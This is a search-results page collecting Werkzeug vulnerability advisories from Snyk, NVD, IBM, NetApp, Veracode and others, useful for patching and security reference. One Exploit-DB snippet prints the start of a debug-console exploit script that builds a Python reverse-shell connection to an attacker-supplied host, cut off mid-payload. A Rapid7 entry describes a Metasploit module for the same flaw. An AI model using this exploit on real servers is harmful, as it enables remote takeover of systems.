Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
Werkzeug 2.0.3 vulnerabilities | Snyk
Learn more about known Werkzeug 2.0.3 vulnerabilities and licenses detected.
MITRE CVE
cve.mitre.org › cgi-bin › cvekey.cgi
Cve
Common vulnerabilities and Exposures (CVE) · We're sorry but the CVE Website doesn't work properly without JavaScript enabled. Please enable it to continue
Snyk
security.snyk.io › snyk vulnerability database › pip
werkzeug | Snyk
A good and healthy external contribution signal for Werkzeug project, which invites more than one hundred open source maintainers to collaborate on the repository. ... Known vulnerabilities in the werkzeug package.
NIST
nvd.nist.gov › vuln › detail › cve-2024-34069
CVE-2024-34069 Detail - NVD
This is a potential security issue, you are being redirected to https://nvd.nist.gov · Official websites use .gov A .gov website belongs to an official government organization in the United States
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - Vulnerable App: #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
Veracode
sca.analysiscenter.veracode.com › vulnerability-database › security › remote-code-execution-rce › python › sid-46780
Python - Remote Code Execution (RCE)
We cannot provide a description for this page right now
IBM
ibm.com › support › pages › security-bulletin-cookie-parsing-vulnerability-werkzeug-allows-subdomain-cookie-injection-≤-v222-affects-watsonxdata
Security Bulletin: Cookie Parsing Vulnerability in Werkzeug Allows Subdomain Cookie Injection (≤ v2.2.2), affects watsonx.data
April 8, 2026 - Werkzeug prior to 2.2.3 will parse ... using a vulnerable browser, the Werkzeug application will see the bad cookie value but the valid cookie key. The issue is fixed in Werkzeug 2.2.3. CWE: CWE-20: Improper Input Validation CVSS Source: IBM X-Force CVSS Base score: 2.6 CVSS Vector: ...
Veracode
sourceclear.com › vulnerability-database › security › directory-traversal › python › sid-20917
Directory Traversal Vulnerability in the werkzeug library | Veracode
werkzeug (werkzeug). werkzeug is vulnerable to directory traversal. An attacker is able to access arbitrary files through the SharedDataMiddleware due to the way Python's `os.path.join()` function works on Windows.
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
werkzeug 2.3.3 | Snyk
Security vulnerabilities and package health score for pip package werkzeug 2.3.3
Netapp
security.netapp.com › advisory › ntap-20240614-0004
CVE-2024-34069 Werkzeug Vulnerability in NetApp Products
June 14, 2024 - NetApp is an industry leader in developing and implementing product security standards. Learn how we can help you maintain the confidentiality, integrity, and availability of your data.
Vulmon
vulmon.com › home › search results
werkzeug vulnerabilities and exploits
Browsers may allow "nameless" cookies that look like `=value` instead of `key=value`. A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like `=__Hos... ... Werkzeug is a comprehensive WSGI web application library.
GitHub
github.com › weka › Chaos_Lab_Web › issues › 15
werkzeug-3.1.3-py3-none-any.whl: 2 vulnerabilities (highest severity is: 5.3) · Issue #15 · weka/Chaos_Lab_Web
November 30, 2025 - Library home page: https://files.pythonhosted.org/packages/52/24/ab44c871b0f07f491e5d2ad12c9bd7358e527510618cb1b803a88e986db1/werkzeug-3.1.3-py3-none-any.whl ... Path to vulnerable library: /tmp/ws-ua_20251126134238_BIMKRN/python_CHGREC/202511261343001/env/lib/python3.9/site-packages/werkzeug-3.1.3.dist-info,/tmp/ws-ua_20251126134238_BIMKRN/python_CHGREC/202511261343001/env/lib/python3.9/site-packages/werkzeug-3.1.3.dist-info
Author weka
CVE Details
cvedetails.com › vulnerability-list › vendor_id-17201 › product_id-41301 › Palletsprojects-Werkzeug.html
Palletsprojects Werkzeug : Security vulnerabilities, CVEs
February 3, 2018 - The issue is fixed in Werkzeug 2.2.3. Source: GitHub, Inc. ... Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body.
GitHub
github.com › microsoft › cascadia-code › issues › 649
There is a vulnerability in Werkzeug 2.0.1,upgrade recommended · Issue #649 · microsoft/cascadia-code
August 31, 2022 - cascadia-code/requirements.txt Line 198 in 017bde5 werkzeug==2.0.1 CVE-2022-29361 Recommended upgrade version:2.1.1
Author microsoft
Rapid7
rapid7.com › db › modules › exploit › multi › http › werkzeug_debug_rce
Pallete Projects Werkzeug Debugger Remote Code ...
June 28, 2015 - Tested against the following Werkzeug versions: - 3.0.3 on Debian 12, Windows 11 and macOS 14.6 - 1.1.4 on Debian 12 - 1.0.1 on Debian 12 - 0.11.5 on Debian 12 - 0.10 on Debian 12 · To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': ... With curated Threat Intelligence, you can see which vulnerabilities ...
Published Jun 28, 2015
CVE
cve.org › CVERecord › SearchResults
Werkzeug
Common vulnerabilities and Exposures (CVE) · We're sorry but the CVE Website doesn't work properly without JavaScript enabled. Please enable it to continue
Cisco Bug Search Tool
bst.cisco.com › quickview › bug › CSCwj47311
Cisco Bug: CSCwj47311 - Vulnerabilities in werkzeug 2.0.2
December 4, 2025 - We cannot provide a description for this page right now
OpenCVE
app.opencve.io › cve
Werkzeug CVEs and Security Vulnerabilities - OpenCVE
CVEs in KEV CVEs with EPSS >= 80% Crit. Microsoft High Apache SQL Injection (CWE-89) Linux Kernel High (CVSS 3.1) Apache Struts RCE (Remote Code Execution) XSS (CWE-79) Critical (CVSS 4.0) CVEs to check